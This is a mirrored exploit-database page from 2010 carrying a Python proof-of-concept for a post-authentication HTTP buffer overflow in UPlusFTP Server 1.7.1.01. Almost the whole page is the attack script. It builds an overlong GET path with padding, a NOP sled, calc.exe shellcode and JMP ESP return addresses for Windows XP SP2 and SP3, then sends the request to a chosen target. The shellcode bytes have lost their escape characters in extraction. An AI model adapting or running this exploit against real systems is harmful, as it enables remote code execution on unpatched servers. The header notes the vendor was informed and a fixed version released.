Home / os / win7

UPlusFTP Server v1.7.1.01 HTTP Remote Buffer Overflow Post A

Posted on 28 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>UPlusFTP Server v1.7.1.01 HTTP Remote Buffer Overflow Post Auth</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===============================================================
UPlusFTP Server v1.7.1.01 HTTP Remote Buffer Overflow Post Auth
===============================================================


#!/usr/bin/python
import socket,sys,base64
 
print &quot;&quot;&quot;
#
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC
    Discovered by : Karn Ganeshen                         
    Author : Karn Ganeshen / corelanc0d3r
                                                    
    KarnGaneshen [aT] gmail [d0t] com                         
    http://ipositivesecurity.blogspot.com
                                                
    Greetz out to:  corelanc0d3r
                    http://corelan.be:8800/index.php
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#
&quot;&quot;&quot;
 
# Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ]
# Date Found : July 21, 2010
# Vendor notified on July 23, 2010
# Issue fixed and new version 1.7.1.02 released on July 23, 2010
 
if len(sys.argv) != 5:
    print &quot;Usage: ./poc.py &lt;Target IP&gt; &lt;Port&gt; &lt;User&gt; &lt;Password&gt;&quot;
    sys.exit(1)
  
target = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
pwd = sys.argv[4]
 
auth = base64.b64encode(user+&quot;:&quot;+pwd)
 
buf=&quot;A&quot;*1963
buf+=&quot;x90&quot;*179
 
# 165 bytes Calc.exe shellcode / badchars identified and excluded
buf+=(&quot;xd9xcax29xc9xb1x24xbfx3fxc7x66x9fxd9x74x24xf4x5e&quot;
&quot;x31x7ex17x03x7ex17x83xf9xc3x84x6axf9x24x0cx95x01&quot;
&quot;xb5x06xd0x3dx3ex64xdex45x41x7ax6bxfax59x0fx33x24&quot;
&quot;x5bxe4x85xafx6fx71x14x41xbex45x8ex31x45x85xc5x4e&quot;
&quot;x87xccx2bx51xc5x3axc7x6ax9dx98x2cxf9xf8x6ax73x25&quot;
&quot;x02x86xeaxaex08x13x78xefx0cxa2x95x84x31x2fx68x71&quot;
&quot;xc0x73x4fx81x10xbax4fxedx1dxfdx7fx68xe1x86x73xf9&quot;
&quot;xa2x7ax07x8dx3ex2ex9cx05x37xdbxaax5exc7xabxadx60&quot;
&quot;xc8x40xc5x5cx97x67xe0xfcx71x01xf4x7fxbdx6ax55x17&quot;
&quot;xcex07x51xb8x46x80xa4xccx99xe7xa7x37xc6x66x34xd4&quot;
&quot;x27x0cxbcx7fx38&quot;)
 
buf+=&quot;x90&quot;*15
 
#[ XP SP2 ] -&gt; &quot;x78x16xF3x77&quot;    #0x77F31678  JMP ESP
buf+=&quot;x78x16xF3x77&quot;
 
#[ XP SP3 ] -&gt; &quot;x3Fx71x49x7E&quot;   #0x7E49713F  JMP ESP
#buf+=&quot;x3Fx71x49x7E&quot;
 
buf+=&quot;x90&quot;*30
buf+=&quot;x66x05x7Ax03&quot;         #ADD AX,037A
buf+=&quot;x66x05x7Ax03&quot;         #ADD AX,037A
buf+=&quot;x66x05x7Ax03&quot;         #ADD AX,037A
buf+=&quot;x50xc3&quot;                 #PUSH EAX + RET
 
print &quot;[+] Launching exploit against &quot; + target + &quot;...&quot;
 
head = &quot;GET /list.html?path=&quot;+buf+&quot; HTTP/1.1 
&quot;
head += &quot;Host: 
&quot;
head += &quot;Authorization: Basic &quot;+auth+&quot;
&quot;
  
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + &quot;
&quot;)
    print &quot;[!] Payload sent...&quot;
    s.close()
except:
    print &quot;[x] Error!&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-28]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :